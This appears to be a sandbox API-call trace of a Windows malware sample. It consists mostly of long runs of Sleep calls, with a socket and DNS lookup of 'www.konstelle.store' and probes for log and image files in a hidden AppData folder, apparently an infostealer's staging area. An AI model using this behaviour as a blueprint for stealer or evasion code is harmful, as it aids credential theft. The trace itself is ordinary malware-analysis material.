[0188.763] Sleep (dwMilliseconds=0x7d0) [0188.764] Sleep (dwMilliseconds=0x7d0) [0188.766] Sleep (dwMilliseconds=0x7d0) [0188.768] Sleep (dwMilliseconds=0x7d0) [0188.769] Sleep (dwMilliseconds=0x7d0) [0188.771] Sleep (dwMilliseconds=0x7d0) [0188.772] Sleep (dwMilliseconds=0x7d0) [0188.774] Sleep (dwMilliseconds=0x7d0) [0188.775] Sleep (dwMilliseconds=0x7d0) [0188.777] Sleep (dwMilliseconds=0x7d0) [0188.778] Sleep (dwMilliseconds=0x7d0) [0188.780] Sleep (dwMilliseconds=0x7d0) [0188.781] Sleep (dwMilliseconds=0x7d0) [0188.783] Sleep (dwMilliseconds=0x7d0) [0188.784] Sleep (dwMilliseconds=0x7d0) [0188.786] Sleep (dwMilliseconds=0x7d0) [0188.787] Sleep (dwMilliseconds=0x7d0) [0188.789] Sleep (dwMilliseconds=0x7d0) [0188.790] Sleep (dwMilliseconds=0x7d0) [0188.792] Sleep (dwMilliseconds=0x7d0) [0188.793] Sleep (dwMilliseconds=0x7d0) [0188.795] Sleep (dwMilliseconds=0x7d0) [0188.796] Sleep (dwMilliseconds=0x7d0) [0188.798] Sleep (dwMilliseconds=0x7d0) [0188.800] Sleep (dwMilliseconds=0x7d0) [0188.801] Sleep (dwMilliseconds=0x7d0) [0188.803] Sleep (dwMilliseconds=0x7d0) [0188.804] Sleep (dwMilliseconds=0x7d0) [0188.806] Sleep (dwMilliseconds=0x7d0) [0188.807] Sleep (dwMilliseconds=0x7d0) [0188.809] Sleep (dwMilliseconds=0x7d0) [0188.810] Sleep (dwMilliseconds=0x7d0) [0188.812] Sleep (dwMilliseconds=0x7d0) [0188.813] Sleep (dwMilliseconds=0x7d0) [0188.815] Sleep (dwMilliseconds=0x7d0) [0188.816] Sleep (dwMilliseconds=0x7d0) [0188.818] Sleep (dwMilliseconds=0x7d0) [0188.819] Sleep (dwMilliseconds=0x7d0) [0188.821] Sleep (dwMilliseconds=0x7d0) [0188.822] Sleep (dwMilliseconds=0x7d0) [0188.824] Sleep (dwMilliseconds=0x7d0) [0188.825] Sleep (dwMilliseconds=0x7d0) [0188.827] Sleep (dwMilliseconds=0x7d0) [0188.828] Sleep (dwMilliseconds=0x7d0) [0188.830] Sleep (dwMilliseconds=0x7d0) [0188.831] Sleep (dwMilliseconds=0x7d0) [0188.833] Sleep (dwMilliseconds=0x7d0) [0188.834] Sleep (dwMilliseconds=0x7d0) [0188.836] Sleep (dwMilliseconds=0x7d0) [0188.838] Sleep (dwMilliseconds=0x7d0) [0188.839] Sleep (dwMilliseconds=0x7d0) [0188.840] Sleep (dwMilliseconds=0x7d0) [0188.842] Sleep (dwMilliseconds=0x7d0) [0188.843] Sleep (dwMilliseconds=0x7d0) [0188.845] Sleep (dwMilliseconds=0x7d0) [0188.846] Sleep (dwMilliseconds=0x7d0) [0188.848] Sleep (dwMilliseconds=0x7d0) [0188.849] Sleep (dwMilliseconds=0x7d0) [0188.851] Sleep (dwMilliseconds=0x7d0) [0188.852] Sleep (dwMilliseconds=0x7d0) [0188.854] Sleep (dwMilliseconds=0x7d0) [0188.855] Sleep (dwMilliseconds=0x7d0) [0188.857] Sleep (dwMilliseconds=0x7d0) [0188.858] Sleep (dwMilliseconds=0x7d0) [0188.860] Sleep (dwMilliseconds=0x7d0) [0188.861] Sleep (dwMilliseconds=0x7d0) [0188.863] Sleep (dwMilliseconds=0x7d0) [0188.864] Sleep (dwMilliseconds=0x7d0) [0188.866] Sleep (dwMilliseconds=0x7d0) [0188.867] Sleep (dwMilliseconds=0x7d0) [0188.869] Sleep (dwMilliseconds=0x7d0) [0188.871] Sleep (dwMilliseconds=0x7d0) [0188.873] Sleep (dwMilliseconds=0x7d0) [0188.874] Sleep (dwMilliseconds=0x7d0) [0188.876] Sleep (dwMilliseconds=0x7d0) [0188.877] Sleep (dwMilliseconds=0x7d0) [0188.879] Sleep (dwMilliseconds=0x7d0) [0188.880] Sleep (dwMilliseconds=0x7d0) [0188.882] Sleep (dwMilliseconds=0x7d0) [0188.883] Sleep (dwMilliseconds=0x7d0) [0188.885] Sleep (dwMilliseconds=0x7d0) [0188.886] Sleep (dwMilliseconds=0x7d0) [0188.888] Sleep (dwMilliseconds=0x7d0) [0188.889] Sleep (dwMilliseconds=0x7d0) [0188.891] Sleep (dwMilliseconds=0x7d0) [0188.892] Sleep (dwMilliseconds=0x7d0) [0188.894] Sleep (dwMilliseconds=0x7d0) [0188.895] Sleep (dwMilliseconds=0x7d0) [0188.897] Sleep (dwMilliseconds=0x7d0) [0188.898] Sleep (dwMilliseconds=0x7d0) [0188.900] Sleep (dwMilliseconds=0x7d0) [0188.901] Sleep (dwMilliseconds=0x7d0) [0188.903] Sleep (dwMilliseconds=0x7d0) [0188.904] Sleep (dwMilliseconds=0x7d0) [0188.906] Sleep (dwMilliseconds=0x7d0) [0188.907] Sleep (dwMilliseconds=0x7d0) [0188.909] Sleep (dwMilliseconds=0x7d0) [0188.911] Sleep (dwMilliseconds=0x7d0) [0188.912] Sleep (dwMilliseconds=0x7d0) [0188.913] Sleep (dwMilliseconds=0x7d0) [0188.915] Sleep (dwMilliseconds=0x7d0) [0188.916] Sleep (dwMilliseconds=0x7d0) [0188.918] Sleep (dwMilliseconds=0x7d0) [0188.919] Sleep (dwMilliseconds=0x7d0) [0188.921] Sleep (dwMilliseconds=0x7d0) [0188.922] Sleep (dwMilliseconds=0x7d0) [0188.924] Sleep (dwMilliseconds=0x7d0) [0188.925] Sleep (dwMilliseconds=0x7d0) [0189.018] socket (af=2, type=1, protocol=6) returned 0x25d0 [0189.019] getaddrinfo (in: pNodeName="www.konstelle.store", pServiceName="80", pHints=0x878f3b8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x878f3e8 | out: ppResult=0x878f3e8*=0x0) returned 11001 [0189.284] Sleep (dwMilliseconds=0x7d0) [0189.286] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlog00.ini", NtPathName=0x10b3fb20, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlog00.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0189.286] NtCreateFile (in: FileHandle=0x10b3fac0, DesiredAccess=0x120089, ObjectAttributes=0x10b3fb30*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlog00.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlog00.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fad0, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fac0*=0xffffffffffffffff, IoStatusBlock=0x10b3fad0*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0189.286] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa40 | out: HeapArray=0x10b3fa40*=0x4b0000) returned 0x6 [0189.286] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x894c370) returned 1 [0189.286] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogri.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogri.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0189.286] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogri.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogri.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0189.286] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0189.286] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x894d180) returned 1 [0189.286] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrf.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrf.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0189.286] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrf.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrf.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0189.286] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0189.286] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x894e1d0) returned 1 [0189.286] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrt.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrt.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0189.287] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrt.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrt.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0189.287] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0189.287] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x894e530) returned 1 [0189.287] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrg.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrg.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0189.287] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrg.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrg.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0189.287] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0189.287] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x894d180) returned 1 [0189.287] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0189.287] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrc.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0189.287] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0189.287] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x894d840) returned 1 [0189.287] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrm.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrm.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0189.287] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrm.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrm.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0189.287] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0189.287] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x894d180) returned 1 [0189.287] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrv.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrv.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0189.287] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrv.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrv.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0189.287] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0189.287] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x894d180) returned 1 [0189.287] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogro.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogro.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0189.287] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogro.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogro.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0189.288] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0189.288] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x894d180) returned 1 [0189.288] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogcl.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogcl.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0189.288] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogcl.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogcl.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0189.288] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0189.288] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x894d180) returned 1 [0189.288] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogim.jpeg", NtPathName=0x10b3fab0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogim.jpeg", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0189.288] NtCreateFile (in: FileHandle=0x10b3fa50, DesiredAccess=0x120089, ObjectAttributes=0x10b3fac0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogim.jpeg" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogim.jpeg"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa60, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa50*=0xffffffffffffffff, IoStatusBlock=0x10b3fa60*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0189.288] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3f9d0 | out: HeapArray=0x10b3f9d0*=0x4b0000) returned 0x6 [0189.288] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x894df00) returned 1 [0189.288] Sleep (dwMilliseconds=0x7d0) [0189.290] Sleep (dwMilliseconds=0x7d0) [0189.291] Sleep (dwMilliseconds=0x7d0) [0189.293] Sleep (dwMilliseconds=0x7d0) [0189.294] Sleep (dwMilliseconds=0x7d0) [0189.296] Sleep (dwMilliseconds=0x7d0) [0189.297] Sleep (dwMilliseconds=0x7d0) [0189.299] Sleep (dwMilliseconds=0x7d0) [0189.300] Sleep (dwMilliseconds=0x7d0) [0189.302] Sleep (dwMilliseconds=0x7d0) [0189.303] Sleep (dwMilliseconds=0x7d0) [0189.305] Sleep (dwMilliseconds=0x7d0) [0189.306] Sleep (dwMilliseconds=0x7d0) [0189.308] Sleep (dwMilliseconds=0x7d0) [0189.309] Sleep (dwMilliseconds=0x7d0) [0189.311] Sleep (dwMilliseconds=0x7d0) [0189.312] Sleep (dwMilliseconds=0x7d0) [0189.314] Sleep (dwMilliseconds=0x7d0) [0189.315] Sleep (dwMilliseconds=0x7d0) [0189.317] Sleep (dwMilliseconds=0x7d0) [0189.318] Sleep (dwMilliseconds=0x7d0) [0189.320] Sleep (dwMilliseconds=0x7d0) [0189.321] Sleep (dwMilliseconds=0x7d0) [0189.323] Sleep (dwMilliseconds=0x7d0) [0189.324] Sleep (dwMilliseconds=0x7d0) [0189.326] Sleep (dwMilliseconds=0x7d0) [0189.327] Sleep (dwMilliseconds=0x7d0) [0189.329] Sleep (dwMilliseconds=0x7d0) [0189.330] Sleep (dwMilliseconds=0x7d0) [0189.332] Sleep (dwMilliseconds=0x7d0) [0189.333] Sleep (dwMilliseconds=0x7d0) [0189.335] Sleep (dwMilliseconds=0x7d0) [0189.336] Sleep (dwMilliseconds=0x7d0) [0189.338] Sleep (dwMilliseconds=0x7d0) [0189.339] Sleep (dwMilliseconds=0x7d0) [0189.341] Sleep (dwMilliseconds=0x7d0) [0189.342] Sleep (dwMilliseconds=0x7d0) [0189.344] Sleep (dwMilliseconds=0x7d0) [0189.345] Sleep (dwMilliseconds=0x7d0) [0189.347] Sleep (dwMilliseconds=0x7d0) [0189.348] Sleep (dwMilliseconds=0x7d0) [0189.350] Sleep (dwMilliseconds=0x7d0) [0189.351] Sleep (dwMilliseconds=0x7d0) [0189.353] Sleep (dwMilliseconds=0x7d0) [0189.354] Sleep (dwMilliseconds=0x7d0) [0189.356] Sleep (dwMilliseconds=0x7d0) [0189.357] Sleep (dwMilliseconds=0x7d0) [0189.359] Sleep (dwMilliseconds=0x7d0) [0189.360] Sleep (dwMilliseconds=0x7d0) [0189.362] Sleep (dwMilliseconds=0x7d0) [0189.363] Sleep (dwMilliseconds=0x7d0) [0189.365] Sleep (dwMilliseconds=0x7d0) [0189.366] Sleep (dwMilliseconds=0x7d0) [0189.368] Sleep (dwMilliseconds=0x7d0) [0189.369] Sleep (dwMilliseconds=0x7d0) [0189.371] Sleep (dwMilliseconds=0x7d0) [0189.372] Sleep (dwMilliseconds=0x7d0) [0189.374] Sleep (dwMilliseconds=0x7d0) [0189.375] Sleep (dwMilliseconds=0x7d0) [0189.377] Sleep (dwMilliseconds=0x7d0) [0189.378] Sleep (dwMilliseconds=0x7d0) [0189.395] Sleep (dwMilliseconds=0x7d0) [0189.396] Sleep (dwMilliseconds=0x7d0) [0189.398] Sleep (dwMilliseconds=0x7d0) [0189.399] Sleep (dwMilliseconds=0x7d0) [0189.401] Sleep (dwMilliseconds=0x7d0) [0189.402] Sleep (dwMilliseconds=0x7d0) [0189.404] Sleep (dwMilliseconds=0x7d0) [0189.405] Sleep (dwMilliseconds=0x7d0) [0189.407] Sleep (dwMilliseconds=0x7d0) [0189.408] Sleep (dwMilliseconds=0x7d0) [0189.410] Sleep (dwMilliseconds=0x7d0) [0189.411] Sleep (dwMilliseconds=0x7d0) [0189.413] Sleep (dwMilliseconds=0x7d0) [0189.414] Sleep (dwMilliseconds=0x7d0) [0189.416] Sleep (dwMilliseconds=0x7d0) [0189.417] Sleep (dwMilliseconds=0x7d0) [0189.419] Sleep (dwMilliseconds=0x7d0) [0189.421] Sleep (dwMilliseconds=0x7d0) [0189.422] Sleep (dwMilliseconds=0x7d0) [0189.423] Sleep (dwMilliseconds=0x7d0) [0189.425] Sleep (dwMilliseconds=0x7d0) [0189.426] Sleep (dwMilliseconds=0x7d0) [0189.428] Sleep (dwMilliseconds=0x7d0) [0189.429] Sleep (dwMilliseconds=0x7d0) [0189.431] Sleep (dwMilliseconds=0x7d0) [0189.432] Sleep (dwMilliseconds=0x7d0) [0189.434] Sleep (dwMilliseconds=0x7d0) [0189.435] Sleep (dwMilliseconds=0x7d0) [0189.437] Sleep (dwMilliseconds=0x7d0) [0189.438] Sleep (dwMilliseconds=0x7d0) [0189.440] Sleep (dwMilliseconds=0x7d0) [0189.441] Sleep (dwMilliseconds=0x7d0) [0189.443] Sleep (dwMilliseconds=0x7d0) [0189.444] Sleep (dwMilliseconds=0x7d0) [0189.446] Sleep (dwMilliseconds=0x7d0) [0189.447] Sleep (dwMilliseconds=0x7d0) [0189.449] Sleep (dwMilliseconds=0x7d0) [0189.450] Sleep (dwMilliseconds=0x7d0) [0189.452] Sleep (dwMilliseconds=0x7d0) [0189.453] Sleep (dwMilliseconds=0x7d0) [0189.455] Sleep (dwMilliseconds=0x7d0) [0189.456] Sleep (dwMilliseconds=0x7d0) [0189.458] Sleep (dwMilliseconds=0x7d0) [0189.459] Sleep (dwMilliseconds=0x7d0) [0189.461] Sleep (dwMilliseconds=0x7d0) [0189.462] Sleep (dwMilliseconds=0x7d0) [0189.464] Sleep (dwMilliseconds=0x7d0) [0189.465] Sleep (dwMilliseconds=0x7d0) [0189.467] Sleep (dwMilliseconds=0x7d0) [0189.468] Sleep (dwMilliseconds=0x7d0) [0189.470] Sleep (dwMilliseconds=0x7d0) [0189.471] Sleep (dwMilliseconds=0x7d0) [0189.473] Sleep (dwMilliseconds=0x7d0) [0189.474] Sleep (dwMilliseconds=0x7d0) [0189.476] Sleep (dwMilliseconds=0x7d0) [0189.477] Sleep (dwMilliseconds=0x7d0) [0189.479] Sleep (dwMilliseconds=0x7d0) [0189.480] Sleep (dwMilliseconds=0x7d0) [0189.482] Sleep (dwMilliseconds=0x7d0) [0189.483] Sleep (dwMilliseconds=0x7d0) [0189.485] Sleep (dwMilliseconds=0x7d0) [0189.486] Sleep (dwMilliseconds=0x7d0) [0189.488] Sleep (dwMilliseconds=0x7d0) [0189.489] Sleep (dwMilliseconds=0x7d0) [0189.491] Sleep (dwMilliseconds=0x7d0) [0189.492] Sleep (dwMilliseconds=0x7d0) [0189.495] Sleep (dwMilliseconds=0x7d0) [0189.497] Sleep (dwMilliseconds=0x7d0) [0189.498] Sleep 